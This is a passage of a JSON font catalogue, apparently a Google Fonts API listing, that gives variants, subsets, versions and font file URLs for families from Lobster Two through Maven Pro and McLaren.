        "italic": "http://fonts.gstatic.com/s/lobstertwo/v13/BngOUXZGTXPUvIoyV6yN5-fI5qCr5RCDY_k.ttf",
        "700": "http://fonts.gstatic.com/s/lobstertwo/v13/BngRUXZGTXPUvIoyV6yN5-92w4CByxyKeuDp.ttf",
        "700italic": "http://fonts.gstatic.com/s/lobstertwo/v13/BngTUXZGTXPUvIoyV6yN5-fI3hyEwRiof_DpXMY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Londrina Outline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/londrinaoutline/v11/C8c44dM8vmb14dfsZxhetg3pDH-SfuoxrSKMDvI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Londrina Shadow",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/londrinashadow/v10/oPWX_kB4kOQoWNJmjxLV5JuoCUlXRlaSxkrMCQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Londrina Sketch",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/londrinasketch/v9/c4m41npxGMTnomOHtRU68eIJn8qfWWn5Pos6CA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Londrina Solid",
      "variants": [
        "100",
        "300",
        "regular",
        "900"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/londrinasolid/v10/flUjRq6sw40kQEJxWNgkLuudGfs9KBYesZHhV64.ttf",
        "300": "http://fonts.gstatic.com/s/londrinasolid/v10/flUiRq6sw40kQEJxWNgkLuudGfv1CjY0n53oTrcL.ttf",
        "regular": "http://fonts.gstatic.com/s/londrinasolid/v10/flUhRq6sw40kQEJxWNgkLuudGcNZIhI8tIHh.ttf",
        "900": "http://fonts.gstatic.com/s/londrinasolid/v10/flUiRq6sw40kQEJxWNgkLuudGfvdDzY0n53oTrcL.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Long Cang",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/longcang/v5/LYjAdGP8kkgoTec8zkRgrXArXN7HWQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lora",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v16",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lora/v16/0QI6MX1D_JOuGQbT0gvTJPa787weuyJGmKxemMeZ.ttf",
        "500": "http://fonts.gstatic.com/s/lora/v16/0QI6MX1D_JOuGQbT0gvTJPa787wsuyJGmKxemMeZ.ttf",
        "600": "http://fonts.gstatic.com/s/lora/v16/0QI6MX1D_JOuGQbT0gvTJPa787zAvCJGmKxemMeZ.ttf",
        "700": "http://fonts.gstatic.com/s/lora/v16/0QI6MX1D_JOuGQbT0gvTJPa787z5vCJGmKxemMeZ.ttf",
        "italic": "http://fonts.gstatic.com/s/lora/v16/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFkqh8ndeZzZ0.ttf",
        "500italic": "http://fonts.gstatic.com/s/lora/v16/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-PgFkqh8ndeZzZ0.ttf",
        "600italic": "http://fonts.gstatic.com/s/lora/v16/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-BQCkqh8ndeZzZ0.ttf",
        "700italic": "http://fonts.gstatic.com/s/lora/v16/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Ckqh8ndeZzZ0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Love Ya Like A Sister",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/loveyalikeasister/v11/R70EjzUBlOqPeouhFDfR80-0FhOqJubN-Be78nZcsGGycA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Loved by the King",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lovedbytheking/v10/Gw6gwdP76VDVJNXerebZxUMeRXUF2PiNlXFu2R64.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lovers Quarrel",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/loversquarrel/v8/Yq6N-LSKXTL-5bCy8ksBzpQ_-zAsY7pO6siz.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Luckiest Guy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/luckiestguy/v11/_gP_1RrxsjcxVyin9l9n_j2RStR3qDpraA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lusitana",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lusitana/v8/CSR84z9ShvucWzsMKxhaRuMiSct_.ttf",
        "700": "http://fonts.gstatic.com/s/lusitana/v8/CSR74z9ShvucWzsMKyDmaccqYtd2vfwk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Lustria",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/lustria/v8/9oRONYodvDEyjuhOrCg5MtPyAcg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "M PLUS 1p",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "hebrew",
        "japanese",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v19",
      "lastModified": "2020-03-03",
      "files": {
        "100": "http://fonts.gstatic.com/s/mplus1p/v19/e3tleuShHdiFyPFzBRrQnDQAUW3aq-5N.ttf",
        "300": "http://fonts.gstatic.com/s/mplus1p/v19/e3tmeuShHdiFyPFzBRrQVBYge0PWovdU4w.ttf",
        "regular": "http://fonts.gstatic.com/s/mplus1p/v19/e3tjeuShHdiFyPFzBRro-D4Ec2jKqw.ttf",
        "500": "http://fonts.gstatic.com/s/mplus1p/v19/e3tmeuShHdiFyPFzBRrQDBcge0PWovdU4w.ttf",
        "700": "http://fonts.gstatic.com/s/mplus1p/v19/e3tmeuShHdiFyPFzBRrQRBEge0PWovdU4w.ttf",
        "800": "http://fonts.gstatic.com/s/mplus1p/v19/e3tmeuShHdiFyPFzBRrQWBIge0PWovdU4w.ttf",
        "900": "http://fonts.gstatic.com/s/mplus1p/v19/e3tmeuShHdiFyPFzBRrQfBMge0PWovdU4w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "M PLUS Rounded 1c",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "hebrew",
        "japanese",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2019-11-05",
      "files": {
        "100": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGCAYIAV6gnpUpoWwNkYvrugw9RuM3ixLsg6-av1x0.ttf",
        "300": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0q5psKxeqmzgRK.ttf",
        "regular": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGEAYIAV6gnpUpoWwNkYvrugw9RuPWGzr8C7vav.ttf",
        "500": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM1y55sKxeqmzgRK.ttf",
        "700": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM064ZsKxeqmzgRK.ttf",
        "800": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0m4psKxeqmzgRK.ttf",
        "900": "http://fonts.gstatic.com/s/mplusrounded1c/v10/VdGBAYIAV6gnpUpoWwNkYvrugw9RuM0C45sKxeqmzgRK.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ma Shan Zheng",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mashanzheng/v5/NaPecZTRCLxvwo41b4gvzkXaRMTsDIRSfr0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Macondo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/macondo/v9/RrQQboN9-iB1IXmOS2XO0LBBd4Y.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Macondo Swash Caps",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/macondoswashcaps/v8/6NUL8EaAJgGKZA7lpt941Z9s6ZYgDq6Oekoa_mm5bA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mada",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSdf3nCCL8zkwMIFg.ttf",
        "300": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSdZnkCCL8zkwMIFg.ttf",
        "regular": "http://fonts.gstatic.com/s/mada/v9/7Auwp_0qnzeSTTXMLCrX0kU.ttf",
        "500": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSdcHlCCL8zkwMIFg.ttf",
        "600": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSde3iCCL8zkwMIFg.ttf",
        "700": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSdYnjCCL8zkwMIFg.ttf",
        "900": "http://fonts.gstatic.com/s/mada/v9/7Au_p_0qnzeSdbHhCCL8zkwMIFg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Magra",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/magra/v9/uK_94ruaZus72k5xIDMfO-ed.ttf",
        "700": "http://fonts.gstatic.com/s/magra/v9/uK_w4ruaZus72nbNDxcXEPuUX1ow.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Maiden Orange",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/maidenorange/v11/kJE1BuIX7AUmhi2V4m08kb1XjOZdCZS8FY8.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Maitree",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/maitree/v5/MjQDmil5tffhpBrklhGNWJGovLdh6OE.ttf",
        "300": "http://fonts.gstatic.com/s/maitree/v5/MjQDmil5tffhpBrklnWOWJGovLdh6OE.ttf",
        "regular": "http://fonts.gstatic.com/s/maitree/v5/MjQGmil5tffhpBrkrtmmfJmDoL4.ttf",
        "500": "http://fonts.gstatic.com/s/maitree/v5/MjQDmil5tffhpBrkli2PWJGovLdh6OE.ttf",
        "600": "http://fonts.gstatic.com/s/maitree/v5/MjQDmil5tffhpBrklgGIWJGovLdh6OE.ttf",
        "700": "http://fonts.gstatic.com/s/maitree/v5/MjQDmil5tffhpBrklmWJWJGovLdh6OE.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Major Mono Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/majormonodisplay/v5/RWmVoLyb5fEqtsfBX9PDZIGr2tFubRhLCn2QIndPww.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mako",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mako/v12/H4coBX6Mmc_Z0ST09g478Lo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mali",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/mali/v4/N0bV2SRONuN4QOLlKlRaJdbWgdY.ttf",
        "200italic": "http://fonts.gstatic.com/s/mali/v4/N0bX2SRONuN4SCj8wlVQIfTTkdbJYA.ttf",
        "300": "http://fonts.gstatic.com/s/mali/v4/N0bV2SRONuN4QIbmKlRaJdbWgdY.ttf",
        "300italic": "http://fonts.gstatic.com/s/mali/v4/N0bX2SRONuN4SCj8plZQIfTTkdbJYA.ttf",
        "regular": "http://fonts.gstatic.com/s/mali/v4/N0ba2SRONuN4eCrODlxxOd8.ttf",
        "italic": "http://fonts.gstatic.com/s/mali/v4/N0bU2SRONuN4SCjECn50Kd_PmA.ttf",
        "500": "http://fonts.gstatic.com/s/mali/v4/N0bV2SRONuN4QN7nKlRaJdbWgdY.ttf",
        "500italic": "http://fonts.gstatic.com/s/mali/v4/N0bX2SRONuN4SCj8_ldQIfTTkdbJYA.ttf",
        "600": "http://fonts.gstatic.com/s/mali/v4/N0bV2SRONuN4QPLgKlRaJdbWgdY.ttf",
        "600italic": "http://fonts.gstatic.com/s/mali/v4/N0bX2SRONuN4SCj80lBQIfTTkdbJYA.ttf",
        "700": "http://fonts.gstatic.com/s/mali/v4/N0bV2SRONuN4QJbhKlRaJdbWgdY.ttf",
        "700italic": "http://fonts.gstatic.com/s/mali/v4/N0bX2SRONuN4SCj8tlFQIfTTkdbJYA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mallanna",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mallanna/v8/hv-Vlzx-KEQb84YaDGwzEzRwVvJ-.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mandali",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mandali/v9/LhWlMVbYOfASNfNUVFk1ZPdcKtA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Manjari",
      "variants": [
        "100",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "malayalam"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/manjari/v3/k3kSo8UPMOBO2w1UdbroK2vFIaOV8A.ttf",
        "regular": "http://fonts.gstatic.com/s/manjari/v3/k3kQo8UPMOBO2w1UTd7iL0nAMaM.ttf",
        "700": "http://fonts.gstatic.com/s/manjari/v3/k3kVo8UPMOBO2w1UdWLNC0HrLaqM6Q4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Manrope",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "cyrillic",
        "greek",
        "latin",
        "latin-ext"
      ],
      "version": "v3",
      "lastModified": "2020-06-25",
      "files": {
        "200": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59FO_F87jxeN7B.ttf",
        "300": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk6jFO_F87jxeN7B.ttf",
        "regular": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk79FO_F87jxeN7B.ttf",
        "500": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk7PFO_F87jxeN7B.ttf",
        "600": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4jE-_F87jxeN7B.ttf",
        "700": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk4aE-_F87jxeN7B.ttf",
        "800": "http://fonts.gstatic.com/s/manrope/v3/xn7_YHE41ni1AdIRqAuZuw1Bx9mbZk59E-_F87jxeN7B.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mansalva",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mansalva/v2/aWB4m0aacbtDfvq5NJllI47vdyBg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Manuale",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/manuale/v7/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHke7wD1TB_JHHY.ttf",
        "500": "http://fonts.gstatic.com/s/manuale/v7/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeHWe7wD1TB_JHHY.ttf",
        "600": "http://fonts.gstatic.com/s/manuale/v7/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeE6fLwD1TB_JHHY.ttf",
        "700": "http://fonts.gstatic.com/s/manuale/v7/f0Xp0eas_8Z-TFZdHv3mMxFaSqASeeEDfLwD1TB_JHHY.ttf",
        "italic": "http://fonts.gstatic.com/s/manuale/v7/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOFRA3zRdIWHYr8M.ttf",
        "500italic": "http://fonts.gstatic.com/s/manuale/v7/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOGZA3zRdIWHYr8M.ttf",
        "600italic": "http://fonts.gstatic.com/s/manuale/v7/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOIpH3zRdIWHYr8M.ttf",
        "700italic": "http://fonts.gstatic.com/s/manuale/v7/f0Xn0eas_8Z-TFZdNPTUzMkzITq8fvQsOLNH3zRdIWHYr8M.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marcellus",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/marcellus/v8/wEO_EBrOk8hQLDvIAF8FUfAL3EsHiA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marcellus SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/marcellussc/v8/ke8iOgUHP1dg-Rmi6RWjbLEPgdydGKikhA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marck Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/marckscript/v11/nwpTtK2oNgBA3Or78gapdwuCzyI-aMPF7Q.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Margarine",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/margarine/v9/qkBXXvoE6trLT9Y7YLye5JRLkAXbMQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Markazi Text",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/markazitext/v12/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtfSQT4MlBekmJLo.ttf",
        "500": "http://fonts.gstatic.com/s/markazitext/v12/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtcaQT4MlBekmJLo.ttf",
        "600": "http://fonts.gstatic.com/s/markazitext/v12/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtSqXT4MlBekmJLo.ttf",
        "700": "http://fonts.gstatic.com/s/markazitext/v12/sykh-ydym6AtQaiEtX7yhqb_rV1k_81ZVYYZtROXT4MlBekmJLo.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marko One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/markoone/v10/9Btq3DFG0cnVM5lw1haaKpUfrHPzUw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marmelad",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/marmelad/v10/Qw3eZQdSHj_jK2e-8tFLG-YMC0R8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Martel",
      "variants": [
        "200",
        "300",
        "regular",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XVqekahRbX9vnDzw.ttf",
        "300": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XVzeoahRbX9vnDzw.ttf",
        "regular": "http://fonts.gstatic.com/s/martel/v5/PN_xRfK9oXHga0XtYcI-jT3L_w.ttf",
        "600": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XVuewahRbX9vnDzw.ttf",
        "700": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XV3e0ahRbX9vnDzw.ttf",
        "800": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XVwe4ahRbX9vnDzw.ttf",
        "900": "http://fonts.gstatic.com/s/martel/v5/PN_yRfK9oXHga0XV5e8ahRbX9vnDzw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Martel Sans",
      "variants": [
        "200",
        "300",
        "regular",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hAX5suHFUknqMxQ.ttf",
        "300": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hBz5cuHFUknqMxQ.ttf",
        "regular": "http://fonts.gstatic.com/s/martelsans/v7/h0GsssGi7VdzDgKjM-4d8ijfze-PPlUu.ttf",
        "600": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hAH48uHFUknqMxQ.ttf",
        "700": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hBj4suHFUknqMxQ.ttf",
        "800": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hB_4cuHFUknqMxQ.ttf",
        "900": "http://fonts.gstatic.com/s/martelsans/v7/h0GxssGi7VdzDgKjM-4d8hBb4MuHFUknqMxQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Marvel",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/marvel/v10/nwpVtKeoNgBV0qaIkV7ED366zg.ttf",
        "italic": "http://fonts.gstatic.com/s/marvel/v10/nwpXtKeoNgBV0qa4k1TALXuqzhA7.ttf",
        "700": "http://fonts.gstatic.com/s/marvel/v10/nwpWtKeoNgBV0qawLXHgB1WmxwkiYQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/marvel/v10/nwpQtKeoNgBV0qa4k2x8Al-i5QwyYdrc.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mate",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mate/v9/m8JdjftRd7WZ2z28WoXSaLU.ttf",
        "italic": "http://fonts.gstatic.com/s/mate/v9/m8JTjftRd7WZ6z-2XqfXeLVdbw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mate SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/matesc/v9/-nF8OGQ1-uoVr2wKyiXZ95OkJwA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Maven Pro",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v21",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8SX25nCpozp5GvU.ttf",
        "500": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Rf25nCpozp5GvU.ttf",
        "600": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8fvx5nCpozp5GvU.ttf",
        "700": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8cLx5nCpozp5GvU.ttf",
        "800": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8aXx5nCpozp5GvU.ttf",
        "900": "http://fonts.gstatic.com/s/mavenpro/v21/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Yzx5nCpozp5GvU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "McLaren",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mclaren/v8/2EbnL-ZuAXFqZFXISYYf8z2Yt_c.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Meddon",
      "variants": [
